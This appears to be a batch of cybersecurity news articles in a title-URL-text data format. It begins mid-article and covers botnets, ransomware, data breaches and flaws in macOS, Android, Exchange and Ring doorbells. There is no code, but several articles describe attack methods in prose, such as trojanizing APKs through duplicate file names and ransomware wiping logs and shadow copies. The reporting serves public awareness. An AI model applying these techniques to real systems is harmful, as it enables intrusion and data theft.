In addition to its DDoS and RAT-like functionalities to download and launch additional payloads, Necro is designed with stealth in mind by installing a rootkit that hides its presence on the system. What's more, the bot also injects malicious code to retrieve and execute a JavaScript-based miner from a remote server into HTML and PHP files on infected systems.
While previous versions of the malware exploited flaws in Liferay Portal, Laminas Project, and TerraMaster, the latest variants observed on May 11 and 18 feature command injection exploits targeting Vesta Control Panel, ZeroShell 3.9.0, SCO OpenServer 5.0.7, as well as a remote code execution flaw impacting VMWare vCenter (CVE-2021-21972) that was patched by the company in February.
A version of the botnet, released on May 18, also includes exploits for EternalBlue (CVE-2017-0144) and EternalRomance (CVE-2017-0145), both of which abuse a remote code execution vulnerability in Windows SMB protocol. These new additions serve to highlight that the malware author is actively developing new methods of spreading by taking advantage of publicly disclosed vulnerabilities.
Also of note is the incorporation of a polymorphic engine to mutate its source code with every iteration while keeping the original algorithm intact in a ""rudimentary"" attempt to limit the chances of being detected.
""Necro Python bot shows an actor that follows the latest development in remote command execution exploits on various web applications and includes the new exploits into the bot,"" Talos researchers said. ""This increases its chances of spreading and infecting systems. Users need to make sure to regularly apply the latest security updates to all of the applications, not just operating systems.""
Apple Failed to Patch Rootpipe Mac OS X Yosemite Vulnerability,https://thehackernews.com/2015/04/rootpipe-mac-os-x-vulnerability.html,"Sad but True! Your Apple's Mac computer is vulnerable to a serious privilege escalation flaw, dubbed ""RootPipe,"" even if you are running the latest version of Mac OS X.
What's RootPipe?
Back in October 2014, a Swedish White Hat hacker Emil Kvarnhammar claimed to have discovered a critical privilege escalation vulnerability, he dubbed the backdoor as ""RootPipe,"" in some versions of Mac OS X including the then newest version 10.10 Yosemite.
The vulnerability (CVE-2015-1130) could allow an attacker to take full control of your desktop Mac computer or MacBook laptop, even without any authentication.
Keeping in mind the devastating effect of the RootPipe vulnerability, the researcher privately reported the flaw to Apple and did not disclose the details of the flaw publicly until the company released a patch to fix it.
Apple did release an update but failed to patch RootPipe:
Earlier this month, Apple released the latest version of Mac OS X Yosemite, i.e. OS X Yosemite 10.10.3, and claimed to have fixed the so-called Rootpipe backdoor, which had been residing on Mac computers since 2011.
However, the company did not fix the flaw in the older versions (below 10.10) of the operating system due to uncodified Apple policy on patching, leaving tens of millions of Mac users at risk.
""Apple indicated that this issue required a substantial amount of changes on their side and that they would not backport the fix to 10.9.x and older,"" Kvarnhammar said in a blog post on the TrueSec website.
But here's the worse part:
Apple's RootPipe vulnerability patch for Mac OS X Yosemite 10.10.3 is claimed to be itself vulnerable, which again left all the Mac machines vulnerable to the RootPipe attacks.
Holy Crap!
Patrick Wardle, an ex-NSA staffer and current director of R&D at Synack, claimed to have discovered…
...a new way around Apple's security fix to reabuse the Rootpipe vulnerability, again opening path to the highest privilege level – root access.
Though this time, the attack requires a hacker to have gained local privileges, which could most likely be obtained via a working exploit of other software sitting on Mac machines.
Here's the Video Demonstration:
Wardle has demonstrated his hack attack in action in a video proof-of-concept (POC), which you can watch below:
Wardle has already reported his findings to the Apple's security team and would not disclose the details of his attack code public before the company will not issue a complete and unbreakable fix.
Now, let's just hope to get a tough fix for Rootpipe backdoor this time from Apple. Last time the company took nearly six months to release a patch that was fooled by Wardle sitting on a flight.
OneLogin Password Manager Hacked; Users' Data Can be Decrypted,https://thehackernews.com/2017/06/onelogin-password-manager.html,"Do you use OneLogin password manager? If yes, then immediately change all your account passwords right now.
OneLogin, the cloud-based password management and identity management software company, has admitted that the company has suffered a data breach.
The company announced on Thursday that it had ""detected unauthorised access"" in its United States data region.
Although the company did not provide many details about the nature of the cyber attack, the statement released by the firm suggest that the data breach is extensive.
What Happened? OneLogin, which aims at offering a service that ""secures connections across all users, all devices, and every application,"" has not yet revealed potential weaknesses in its service that may have exposed its users' data in the first place.
""Today We detected unauthorised access to OneLogin data in our US data region,"" OneLogin chief information security officer Alvaro Hoyos said in a brief blog post-Wednesday night.
What type of Information? Although it is not clear exactly what data has been stolen in the hack, a detailed post on a support page that is accessible to customers only, apparently says that all customers served by the company's US data centre are affected, whose data has been compromised.
The stolen data also includes ""the ability to decrypt encrypted data.""
What is OneLogin doing? OneLogin has blocked the unauthorised access to its data centre and is actively working with law enforcement and security firm to investigate the incident and verify the extent of the impact.
""We have since blocked this unauthorised access, reported the matter to law enforcement, and are working with an independent security firm to determine how the unauthorised access happened and verify the extent of the impact of this incident,"" Hoyos said.
""We are actively working to determine how best to prevent such an incident from occurring in the future.""
What Should You Do Now? First of all, change passwords for all your accounts that you have linked with OneLogin.
The company has given customers an extensive list of actions to do to protect themselves and minimise the risk to their data, which includes:
Forcing a password reset for all of its customers.
Generating new security credentials, OAuth tokens, and certificates for apps and websites.
Recycling secrets stored in OneLogin's secure notes.
For any other queries, OneLogin customers can contact the company at security-support@onelogin.com.
You should also particularly be alert of the Phishing emails, which are usually the next step of cyber criminals after a breach. Phishing is designed to trick users into giving up further details like passwords and bank information.
This is the second data breach the company has suffered within a year. In August 2016, a OneLogin suffered a separate data breach in which an unauthorized hacker gained access to one of the company's standalone systems, which it used for ""log storage and analytics.""
New Fileless Ransomware with Code Injection Ability Detected in the Wild,https://thehackernews.com/2017/06/fileless-ransomware-code-injection.html,"It is no secret that hackers and cybercriminals are becoming dramatically more adept, innovative, and stealthy with each passing day.
While new forms of cybercrime are on the rise, traditional activities seem to be shifting towards more clandestine techniques that come with limitless attack vectors with low detection rates.
Security researchers have recently discovered a new fileless ransomware, dubbed ""Sorebrect,"" which injects malicious code into a legitimate system process (svchost.exe) on a targeted system and then self-destruct itself in order to evade detection.
Unlike traditional ransomware, Sorebrect has been designed to target enterprise's servers and endpoint. The injected code then initiates the file encryption process on the local machine and connected network shares.
This fileless ransomware first compromises administrator credentials by brute forcing or some other means and then uses Microsoft's Sysinternals PsExec command-line utility to encrypt files.
""PsExec can enable attackers to run remotely executed commands, instead of providing and using an entire interactive login session, or manually transferring the malware into a remote machine, like in RDPs,"" Trend Micro says.
Sorebrect Also Encrypts Network Shares
Sorebrect also scans the local network for other connected computers with open shares and locks files available on them as well.
""If the share has been set up such that anyone connected to it has read-and-write access to it, the share will also be encrypted,"" researchers say.
The nasty ransomware then deletes all event logs (using wevtutil.exe) and shadow copies (using vssadmin) on the infected machine that could provide forensic evidence such as files executed on the system and their timestamps, which makes this threat hard-to-detect.
In addition, Sorebrect uses the Tor network protocol in an attempt to anonymize its communication with its command-and-control (C&C) server, just like almost every other malware.
Sorebrect Ransomware Spreads Worldwide
The Sorebrect fileless ransomware has been designed to target systems from various industries including manufacturing, technology, and telecommunications.
According to Trend Micro, Sorebrect was initially targeting Middle Eastern countries like Kuwait and Lebanon, but from last month, this threat has started infecting people in Canada, China, Croatia, Italy, Japan, Mexico, Russia, Taiwan, and the U.S.
""Given ransomware's potential impact and profitability, it wouldn't be a surprise if SOREBRECT turns up in other parts of the world, or even in the cybercriminal underground where it can be peddled as a service,"" the researchers note.
This is not the first time when researchers have come across Fileless malware. Two months ago, Talos researchers discovered a DNSMessenger attack that was completely Fileless and used DNS TXT messaging capabilities to compromise systems.
In February, Kaspersky researchers also discovered fileless malware that resided solely in the memory of the compromised computers, which was found targeting banks, telecommunication companies, and government organizations in 40 countries.
Ways to Protect Against Ransomware Attacks
Since the ransomware does not target individuals but organizations, sysadmins and information security professionals can protect themselves by:
Restricting user write permissions: a significant factor that exposes network shares to ransomware by giving users full permissions.
Limiting privilege for PsExec: Limit PsExec and provide permission to run them only to system administrators.
Keeping your system and network up-to-date: Always keep your operating system, software, and other applications updated.
Backing up your data regularly: To always have a tight grip on all your important files and documents, keep a good backup routine in place that makes their copies to an external storage device that is not always connected to your PC.
Adopting a cyber security-aware workforce: Educating your employees about malware, threat vectors and security measure always plays a major role in any organization.
Hijacking Servers Remotely with Hikit advanced persistent threat,https://thehackernews.com/2012/08/hijacking-servers-remotely-with-hikit.html,"Security researchers have revealed the existence of an advanced persistent threat that has been making the rounds since April 2011. Backdoor.Hikit is a dangerous backdoor Trojan that will damage infected system and files. Usually, Backdoor. Hikit will open backdoor to allow remote attackers to connect to the infected system and carry out harmful activities, such as stealing information or destroying files and programs.
It is really stubborn those antiviruses often fail to delete it for good, for it runs secretly and automatically when Windows boots without your knowledge or consent and can disguise it as fake system files or processes. Besides, many other threats, such as adware, redirecting virus, Trojan variants from family, such as Trojan Horse Generic 27.PN, BackDoor.Hupigon5.CJMY, Trojan.Zeroaccess.C, Trojan:win64/Sirefef.E and so on, which is really a threat to system and data security.
According to experts from security firm Symantec, it all starts with the unknown dropper which installs a DLL backdoor onto the compromised device. This backdoor then installs the driver component that allows the attacker to communicate with the infected computer.
Unlike many other pieces of malware, Hikit doesn't attempt to contact its command and control server once it infects a device. Instead, the kernel is designed to wait for the attacker to initiate communications, significantly reducing the threat's operational capabilities.
Backdoor.Hikit is compromised of four components:
Unknown dropper that compromises a system and installs a malicious dynamic-link library (DLL) file
DLL that implements back door functionality and installs a kernel driver
Kernel driver that monitors network traffic for connections from an attacker
Client tool that attackers use to connect to the back door
It is greatly possible that your online saved accounts and passwords, personal and financial information will be exposed and transfer to remote hackers, which will lead to identified thief. To secure your computer and keep it away from any threats, you must get rid of Backdoor.Hikit without any hesitation.
Symantec is continuing to investigate this threat and will provide more information when available.
Global Internet Authority — ICANN Hacked Again!,https://thehackernews.com/2015/08/icann-hacked.html,"ICANN (Internet Corporation for Assigned Names and Numbers) – the organisation responsible for allocating domain names and IP addresses for the Internet – has been hacked, potentially compromising its customers' names, email addresses, hashed passwords, and more.
The US-administered non-profit corporation admitted on Wednesday that its server security was breached within the past week and that…
…an ""unauthorised person"" gained access to usernames, email addresses, and encrypted passwords for profile accounts on ICANN.org public website.
The organisation believes that the leaked information includes harmless information such as user preferences, public biographies, interests, newsletters, and subscriptions.
Less than ten months ago, ICANN was hacked by a hacker who gained access to its internal system following a spear phishing attack in November last year. Employees were tricked into handing over their credentials after receiving malicious emails apparently sent from the ICANN's own domain.
With those details, the hackers then managed to access ICANN systems, including the Centralized Zone Data System (CZDS), the domain registration Whois portal, the wiki pages of the ICANN Governmental Advisory Committee (GAC), and ICANN blog.
The passwords compromised in the latest data breach were encrypted one-way using the bcrypt algorithm.
""These encrypted passwords (hashes) are not easy to reverse,"" ICANN said, ""but as a precaution we [require] that all users reset their passwords.""
However, there's no evidence that any profile accounts, or its internal systems have been accessed without authorization, nor any operational data, financial data, or IANA (Internet Assigned Numbers Authority) systems were involved.
The IANA is also a part of ICANN, which performs the actual management of the DNS root zone, globally-unique names and numbers.
Users are recommended to change their online account passwords, or just not using the same password across multiple websites.
Developer expelled by Google Play Store on posting Malicious Android apps,https://thehackernews.com/2013/01/developer-expelled-by-google-play-store.html,"Google Play Developer Console enables developers to easily publish and distribute their applications directly to users of Android-compatible phones. Recently someone posted on Reddit that a developer is trying to spread malware by masquerading infected programs as legitimate software.
The account of the developer called, ""apkdeveloper"" and readers spotted that they are posting fake malware apps by names of famous android games and apps, using the word ""Super"" as suffix to them, making them seem as an upgraded version of the game.
The users can find the difference between the real app and malicious app by observing the device permissions, like as compared to the simple permissions like network access and read write access of the original Temple Run app, the 'Temple Run Super' app asks for sensitive information like location, phone status, identity and access to user accounts.
After many report abuse Google Play has removed the developer from the store page with all apps. Android smartphones and tablets, and device users are being cautioned to make efforts to protect themselves against it in the 2013.
Last week we also reported about another malware that is capable of attacks that involve execution of Distributed Denial of Service (DDoS).
Chinese Hackers discovered second Android master key vulnerability,https://thehackernews.com/2013/07/chinese-hackers-discovered-second.html,"Android Security Squad, the China-based group that uncovered a second Android master key vulnerability that might be abused to modify smartphone apps without breaking their digital signatures.
The whole point of digitally signing a document or file is to prove the file hasn't been modified. The process uses a form of public-key cryptography. In Chinese version of hacking attack, malicious code can be added into the file headers, but the method is limited because targeted files need to be smaller than 64K in size.
APK files are packed using a version of the widespread ZIP archiving algorithm. Most ZIP implementations won't permit two same-named files in one archive, but the algorithm itself doesn't forbid that possibility. So basically, two versions of the classes.dex file are placed inside of the package, the original and a hacked alternative.
When checking an app's digital signature, the Android OS looks at the first matching file, but when actually executing and launching the file, it grabs the last one. To Trojanize an app, then, all you need to do is shoehorn your malicious code into it using a name that already exists within the app.
The flaw is very similar to the first master key vulnerability recently announced by researchers from mobile security firm Bluebox Security. According to BlueBox, 99% of Android devices are vulnerable to this attack. Google has already patched the flaw and posted it to the Android Open Source Project (AOSP).
You can use ReKey, a free mobile app that's designed to patch the Android master key vulnerability that's present in an estimated 900 million devices that run Android and that could be exploited by attackers to take full control of a device.
Always get your apps from legitimate sources, always check to make sure the developer name is valid, and configure your phone so it doesn't permit installing apps from unknown sources.
Microsoft.com.br (Brasil) hacked by TG hacker,https://thehackernews.com/2011/07/microsoftcombr-brasil-hacked-by-tg.html,"Microsoft.com.br (Brasil) hacked by TG hacker
Microsoft Brasil https://microsoft.com.br/ Got defaced by Hacker named ""TG"".
Hacker redirect server address microsoft.com.br to the page of Microsoft Brazil. Instead of being sent to the developer page of Windows, the Internet user that accesses the address is faced with a message published by hackers as ""Ms Brazil 0wn3d by TG"". The forwarding service is hosted on an external server.
"How Russian Hackers Placed ""Digital Bomb"" Into the NASDAQ",https://thehackernews.com/2014/07/how-russian-hackers-placed-digital-bomb.html,"Four years ago, NASDAQ servers were compromised by Russian hackers, who were somehow able to insert a ""digital bomb"" into the systems of NASDAQ stock exchange, which would have been able to cause several damage to the computer systems in the stock market and could bring down the entire structure of the financial system of the United States.
Till now, identities of the hackers have not been identified by the agencies who are investigating the whole incident from past four years. However, it has been identified that the intruder was not a student or a teen, but the intelligence agency of another country.
The Hackers successfully infiltrated the network of NASDAQ stock exchange with customized malware which had ability to extract data from the systems and carry out surveillance as well. However, a closer look at the malware indicated that it was designed to cause widespread disruption in the NASDAQ computer system.
According to a magazine cover story, the malware that was actually used by the hackers to infect NASDAQ servers exploited two mystery zero-day vulnerabilities.
The attack on the NASDAQ stock exchange was reported by Bloomberg Businessweek in its investigative cover story, ""The Nasdaq Hack"", which detailed the incidents took place at the NASDAQ leading up to the discovery of the inserted digital time bomb.
According to the magazine, it all started in October 2010, when the FBI was monitoring the Internet traffic in the United States and noticed a signal coming from NASDAQ, which indicated a malware infection. The most troubling part was that the malware was actually an attack code, which was created to cause significant damage, from another country's foreign intelligence agency.
In February 2011, NASDAQ stock exchange confirmed the breach to its network and notified its customers.
The feds alerted and warned NASDAQ officials, who already knew about a compromise in their systems but had neglected to bother and inform anyone about it. The U.S. National Security Agency (NSA) was called in to help investigate the hack attacks against the company that runs the NASDAQ stock market.
After a five-month investigation by the FBI, NSA, CIA and US Treasury Department, it was uncovered that the malware used two unnamed Zero-day security flaws, for which there were no patches existed. Rather, it is unclear that the hackers targeted which software, and whether the hackers used these zero-day vulnerabilities to infect NASDAQ systems or to exfiltrate data.
In fact, one of the forensic investigators described the NASDAQ servers as ""the dirty swamp,"" because very few records were available that would have revealed daily activities on the servers and helped retrace the steps of the intruders.
""The agents found little evidence of a broader attack. What they did find were systematic security failures riddling some of the most important U.S. financial institutions. It turned out that many on the list were vulnerable to the same attack that struck Nasdaq. They were spared only because the hackers hadn't bothered to try.""
Further analysis of the attacking code indicated that the malware attacked the NASDAQ systems was similar in design to the malware written by the Russian Federal Security Service for the purpose of spying and, NSA agents says, had the ability to seriously disrupt the exchange's activities.
But it is also possible that the malware which had been used belongs to another country, Bloomberg notes. China was a primary suspect, for both its intrinsic features and its ability to confuse an investigation.
Nasdaq spokesperson says that the malware did not reach the stock exchange, as originally stated in the cover story headline. ""The events of four years ago, while sensationalized by Businessweek, only confirmed what we have said historically: that none of Nasdaq's trading platforms or engines were ever compromised, and no evidence of exfiltration exists from directors' desks,"" said NASDAQ spokesman Ryan Wells.
US Warns of 'DeltaCharlie' – A North Korean DDoS Botnet Malware,https://thehackernews.com/2017/06/north-korea-hacking-malware.html,"The United States government has released a rare alert about an ongoing, eight-year-long North Korean state-sponsored hacking operation.
The joint report from the FBI and U.S. Department of Homeland Security (DHS) provided details on ""DeltaCharlie,"" a malware variant used by ""Hidden Cobra"" hacking group to infect hundreds of thousands of computers globally as part of its DDoS botnet network.
According to the report, the Hidden Cobra group of hackers are believed to be backed by the North Korean government and are known to launch cyber attacks against global institutions, including media organizations, aerospace and financial sectors, and critical infrastructure.
While the US government has labeled the North Korean hacking group Hidden Cobra, it is often known as Lazarus Group and Guardians of Peace – the one allegedly linked to the devastating WannaCry ransomware menace that shut down hospitals and businesses worldwide.
DeltaCharlie – DDoS Botnet Malware
The agencies identified IP addresses with ""high confidence"" associated with ""DeltaCharlie"" – a DDoS tool which the DHS and FBI believe North Korea uses to launch distributed denial-of-service (DDoS) attacks against its targets.
DeltaCharlie is capable of launching a variety of DDoS attacks on its targets, including Domain Name System (DNS) attacks, Network Time Protocol (NTP) attacks, and Character Generation Protocol (CGP) attacks.
The botnet malware is capable of downloading executables on the infected systems, updating its own binaries, changing its own configuration in real-time, terminating its processes, and activating and terminating DDoS attacks.
However, the DeltaCharlie DDoS malware is not new.
DeltaCharlie was initially reported by Novetta in their 2016 Operation Blockbuster Malware Report [PDF], which described this as the third botnet malware from the North Korean hacking group, after DeltaAlpha and DeltaBravo.
Other malware used by Hidden Cobra include Destover, Wild Positron or Duuzer, and Hangman with sophisticated capabilities, including DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware.
Hidden Cobra's Favorite Vulnerabilities
Operating since 2009, Hidden Cobra typically targets systems running older, unsupported versions of Microsoft operating systems, and commonly exploits vulnerabilities in Adobe Flash Player to gain an initial entry point into victim's machine.
These are the known vulnerabilities affecting various applications usually exploited by Hidden Cobra:
Hangul Word Processor bug (CVE-2015-6585)
Microsoft Silverlight flaw (CVE-2015-8651)
Adobe Flash Player and 19.x vulnerability (CVE-2016-0034)
Adobe Flash Player Vulnerability (CVE-2016-1019)
Adobe Flash Player Vulnerability (CVE-2016-4117)
The simplest way to defend against such attacks is always to keep your operating system and installed software and applications up-to-date, and protect your network assets behind a firewall.
Since Adobe Flash Player is prone to many attacks and just today the company patched nine vulnerability in Player, you are advised to update or remove it completely from your computer.
The FBI and DHS have provided numerous indicators of compromise (IOCs), malware descriptions, network signatures, as well as host-based rules (YARA rules) in an attempt to help defenders detect activity conducted by the North Korean state-sponsored hacking group.
""If users or administrators detect the custom tools indicative of HIDDEN COBRA, these tools should be immediately flagged, reported to the DHS National Cybersecurity Communications and Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and given highest priority for enhanced mitigation,"" the alert reads.
Besides this, the agencies have also provided a long list of mitigations for users and network administrators, which you can follow here.
New Mirai-Inspired Botnet Could Be Using Your KGUARD DVRs in Cyber Attacks,https://thehackernews.com/2021/07/new-mirai-inspired-botnet-could-be.html,"Cybersecurity researchers on Thursday revealed details about a new Mirai-inspired botnet called ""mirai_ptea"" that leverages an undisclosed vulnerability in digital video recorders (DVR) provided by KGUARD to propagate and carry out distributed denial-of-service (DDoS) attacks.
Chinese security firm Netlab 360 pinned the first probe against the flaw on March 23, 2021, before it detected active exploitation attempts by the botnet on June 22, 2021.
The Mirai botnet, since emerging on the scene in 2016, has been linked to a string of large-scale DDoS attacks, including one against DNS service provider Dyn in October 2016, causing major internet platforms and services to remain inaccessible to users in Europe and North America.
Since then, numerous variants of Mirai have sprung up on the threat landscape, in part due to the availability of its source code on the Internet. Mirai_ptea is no exception.
Not much has been disclosed about the security flaw in an attempt to prevent further exploitation, but the researchers said the KGUARD DVR firmware had vulnerable code prior to 2017 that enabled remote execution of system commands without authentication. At least approximately 3,000 devices exposed online are susceptible to the vulnerability.
Besides using Tor Proxy to communicate with the command-and-control (C2) server, an analysis of the mirai_ptea sample revealed extensive encryption of all sensitive resource information, which is decoded to establish a connection with the C2 server and retrieve attack commands for execution, including launching DDoS attacks.
""The geographic distribution of bot source IPs is [...] mainly concentrated in the United States, Korea and Brazil,"" the researchers noted, with infections reported across Europe, Asia, Australia, North and South America, and parts of Africa.
19-Year-Old Teenager Arrested for Exploiting Heartbleed Bug to Steal Data,https://thehackernews.com/2014/04/19-year-old-teenager-arrested-for_16.html,"A teenager has been arrested by the Canadian police in relation to the infamous malicious breach on the country's taxpayer system using one of the most critical internet flaws, Heartbleed.
Heartbleed bug, that made headlines over past two weeks and every websites around the world flooded with its articles. Every informational website, Media and Security researchers are talking about Heartbleed, probably the biggest Internet vulnerability in recent history.
According to the Royal Canadian Mounted Police (RCMP), a 19-year-old 'Stephen Arthuro Solis-Reyes' of London, Ontario, is charged with the unauthorized access of the computer and criminal mischief in relation to the data breach of taxpayer's private information from the Canada Revenue Agency (CRA) website.
""The RCMP treated this breach of security as a high priority case and mobilized the necessary resources to resolve the matter as quickly as possible,"" Assistant Commissioner Gilles Michaud said in a statement.
""Investigators from National Division, along with our counterparts in 'Ontario' Division have been working tirelessly over the last four days analyzing data, following leads, conducting interviews, obtaining and executing legal authorizations and liaising with our partners,"" he added.
After the public disclosure of Heartbleed bug on April 9, Solis-Reyes allegedly exploited this most critical security vulnerability, present in the OpenSSL of the CRA servers, to extract the private and sensitive information, including the social insurance numbers from the company's system, before the computers were patched.
Heartbleed is a critical bug in the OpenSSL's implementation of the TLS/DTLS heartbeat extension that allows attackers to read portions of the affected server's memory, potentially revealing users data, that the server did not intend to reveal.
Though there were allegations on the U.S. intelligence agency NSA of using the Heartbleed vulnerabilities from years to gather confidential information. But, this is the first known incident of hacker exploiting the critical internet Heartbleed bug to steal and compromise the data from the servers which are running on an affected OpenSSL version.
Exploiting the Heartbleed bug itself rarely leaves any traces, unless the attacker is not sending millions of heartbeats continuously from his own IP addresses. ""The fact that they were able to trace it back to someone implies that it is not the work of organized crime or a professional hacker. It would be someone of very low skill."" said Mark Nunnikhoven, Trend Micro.
Solis-Reyes was arrested at his residence without incident on April 15 and is scheduled to appear in court in Ottawa on July 17, 2014, RCMP reported. The police also seized computer equipment from his residence, while the investigation is ongoing.
More on HeartBleed:
HeartBleed Bug Explained - 10 Most Frequently Asked Questions
How Heartbleed Bug Exposes Your Passwords to Hackers
German Developer responsible for HeartBleed Bug in OpenSSL
How to Protect yourself from the 'Heartbleed' Bug
Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable
NSA denies Report that Agency knew and exploited Heartbleed Vulnerability
Billions of Smartphone Users affected by Heartbleed Vulnerability
DroidMorph Shows Popular Android Antivirus Fail to Detect Cloned Malicious Apps,https://thehackernews.com/2021/06/droidmorph-shows-popular-android.html,"A new research published by a group of academics has found that anti-virus programs for Android continue to remain vulnerable against different permutations of malware, in what could pose a serious risk as malicious actors evolve their toolsets to better evade analysis.
""Malware writers use stealthy mutations (morphing/obfuscations) to continuously develop malware clones, thwarting detection by signature based detectors,"" the researchers said. ""This attack of clones seriously threatens all the mobile platforms, especially Android.""
The findings were published in a study last week by researchers from Adana Science and Technology University, Turkey, and the National University of Science and Technology, Islamabad, Pakistan.
Unlike iOS, apps can be downloaded from third-party sources on Android devices, raising the possibility that unwitting users can install unverified and lookalike apps that clone a legitimate app's functionality but are built to trick targets into downloading apps laced with fraudulent code that are capable of stealing sensitive information.
What's more, malware authors can expand on this technique to develop multiple clones of the rogue software with varying levels of abstraction and obfuscation to disguise their true intent and slip through the defense barriers created by anti-malware engines.
To test and evaluate the resilience of commercially available anti-malware products against this attack, the researchers developed a tool called DroidMorph, which allows Android applications (APKs) to be ""morphed"" by decompiling the files to an intermediate form that's then modified and compiled to create clones, both benign and malware.
Morphing could be at different levels, the researchers noted, such as those that involve changing the class and method names in the source code or something non-trivial that could alter the execution flow of the program, including the call graph and the control-flow graph.
In a test conducted using 1,771 morphed APK variants generated through DroidMorph, the researchers found that 8 out of 17 leading commercial anti-malware programs failed to detect any of the cloned applications, with an average detection rate of 51.4% for class morphing, 58.8% for method morphing, and 54.1% for body morphing observed across all programs.
The anti-malware programs that were successfully bypassed include LineSecurity, MaxSecurity, DUSecurityLabs, AntivirusPro, 360Security, SecuritySystems, GoSecurity, and LAAntivirusLab.
As future work, the researchers outlined that they intend to add more obfuscations at different levels as well as enable morphing of metadata information such as permissions that are embedded in an APK file with an aim to bring down the detection rates.
Microsoft Exchange Cyber Attack — What Do We Know So Far?,https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html,"Microsoft on Friday warned of active attacks exploiting unpatched Exchange Servers carried out by multiple threat actors, as the hacking campaign is believed to have infected tens of thousands of businesses, government entities in the U.S., Asia, and Europe.
The company said ""it continues to see increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM,"" signaling an escalation that the breaches are no longer ""limited and targeted"" as was previously deemed.
According to independent cybersecurity journalist Brian Krebs, at least 30,000 entities across the U.S. — mainly small businesses, towns, cities, and local governments — have been compromised by an ""unusually aggressive"" Chinese group that has set its sights on stealing emails from victim organizations by exploiting previously undisclosed flaws in Exchange Server.
Victims are also being reported from outside the U.S., with email systems belonging to businesses in Norway, the Czech Republic and the Netherlands impacted in a series of hacking incidents abusing the vulnerabilities. The Norwegian National Security Authority said it has implemented a vulnerability scan of IP addresses in the country to identify vulnerable Exchange servers and ""continuously notify these companies.""
The colossal scale of the ongoing offensive against Microsoft's email servers also eclipses the SolarWinds hacking spree that came to light last December, which is said to have targeted as many as 18,000 customers of the IT management tools provider. But as it was with the SolarWinds hack, the attackers are likely to have only gone after high-value targets based on an initial reconnaissance of the victim machines.
Unpatched Exchange Servers at Risk of Exploitation
A successful exploitation of the flaws allows the adversaries to break into Microsoft Exchange Servers in target environments and subsequently allow the installation of unauthorized web-based backdoors to facilitate long-term access. With multiple threat actors leveraging these zero-day vulnerabilities, the post-exploitation activities are expected to differ from one group to the other based on their motives.
Chief among the vulnerabilities is CVE-2021-26855, also called ""ProxyLogon"" (no connection to ZeroLogon), which permits an attacker to bypass the authentication of an on-premises Microsoft Exchange Server that's able to receive untrusted connections from an external source on port 443. This is followed by the exploitation of CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 post-authentication, allowing the malicious party to gain remote access.
Taiwanese cybersecurity firm Devcore, which began an internal audit of Exchange Server security in October last year, noted in a timeline that it discovered both CVE-2021-26855 and CVE-2021-27065 within a 10-day period between December 10-20, 2020. After chaining these bugs into a workable pre-authentication RCE exploit, the company said it reported the issue to Microsoft on January 5, 2021, suggesting that Microsoft had almost two months to release a fix.
The four security issues in question were eventually patched by Microsoft as part of an emergency out-of-band security update last Tuesday, while warning that ""many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.""
The fact that Microsoft also patched Exchange Server 2010 suggests that the vulnerabilities have been lurking in the code for more than ten years.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), which released an emergency directive warning of ""active exploitation"" of the vulnerabilities, urged government agencies running vulnerable versions of Exchange Server to either update the software or disconnect the products from their networks.
""CISA is aware of widespread domestic and international exploitation of Microsoft Exchange Server vulnerabilities and urges scanning Exchange Server logs with Microsoft's IoC detection tool to help determine compromise,"" the agency tweeted on March 6.
It's worth noting that merely installing the patches issued by Microsoft would have no effect on servers that have already been backdoored. Organizations that have been breached to deploy the web shell and other post-exploitation tools continue to remain at risk of future compromise until the artifacts are completely rooted out from their networks.
Multiple Clusters Spotted
FireEye's Mandiant threat intelligence team said it ""observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment"" since the start of the year. Cybersecurity firm Volexity, one of the firms credited with discovering the flaws, said the intrusion campaigns appeared to have started around January 6, 2021.
Not much is known about the identities of the attackers, except that Microsoft has primarily attributed the exploits with high confidence to a group it calls Hafnium, a skilled government-backed group operating out of China. Mandiant is tracking the intrusion activity in three clusters, UNC2639, UNC2640, and UNC2643, adding it expects the number to increase as more attacks are detected.
In a statement to Reuters, a Chinese government spokesman denied the country was behind the intrusions.
""There are at least five different clusters of activity that appear to be exploiting the vulnerabilities,"" said Katie Nickels, director of threat intelligence at Red Canary, while noting the differences in the techniques and infrastructure from that of the Hafnium actor.
In one particular instance, the cybersecurity firm observed that some of the customers compromised Exchange servers had been deployed with a crypto-mining software called DLTminer, a malware documented by Carbon Black in 2019.
""One possibility is that Hafnium adversaries shared or sold exploit code, resulting in other groups being able to exploit these vulnerabilities,"" Nickels said. ""Another is that adversaries could have reverse engineered the patches released by Microsoft to independently figure out how to exploit the vulnerabilities.""
Microsoft Issues Mitigation Guidance
Aside from rolling out fixes, Microsoft has published new alternative mitigation guidance to help Exchange customers who need more time to patch their deployments, in addition to pushing out a new update for the Microsoft Safety Scanner (MSERT) tool to detect web shells and releasing a script for checking HAFNIUM indicators of compromise. They can be found here.
""These vulnerabilities are significant and need to be taken seriously,"" Mat Gangwer, senior director of managed threat response at Sophos said. ""They allow attackers to remotely execute commands on these servers without the need for credentials, and any threat actor could potentially abuse them.""
""The broad installation of Exchange and its exposure to the internet mean that many organizations running an on-premises Exchange server could be at risk,"" Gangwer added.
Amazon's Ring Video Doorbell Lets Attackers Steal Your Wi-Fi Password,https://thehackernews.com/2019/11/ring-doorbell-wifi-password.html,"Security researchers at Bitdefender have discovered a high-severity security vulnerability in Amazon's Ring Video Doorbell Pro devices that could allow nearby attackers to steal your WiFi password and launch a variety of cyberattacks using MitM against other devices connected to the same network.
In case you don't own one of these, Amazon's Ring Video Doorbell is a smart wireless home security doorbell camera that lets you see, hear and speak to anyone on your property from anywhere in the World.
The smart doorbell needs to be connected to your WiFi network, allowing you to remotely access the device from a smartphone app to perform all tasks wirelessly.
While setting up the device for the very first time and share your WiFi password with it, you need to enable the configuration mode from the doorbell.
Entering into the configuration mode turns on a built-in, unprotected wireless access point, allowing the RING smartphone app installed on your device to automatically connect to the doorbell.
However, researchers told The Hacker News that besides using an access point with no password, the initial communication between the Ring app and the doorbell, i.e., when you share your home's WiFi password with the doorbell, is performed insecurely through plain HTTP.
Thus, a nearby attacker can simply connect to the same unprotected wireless access point, while the setup in the process, and steal your WiFi password using a man-in-the-middle attack.
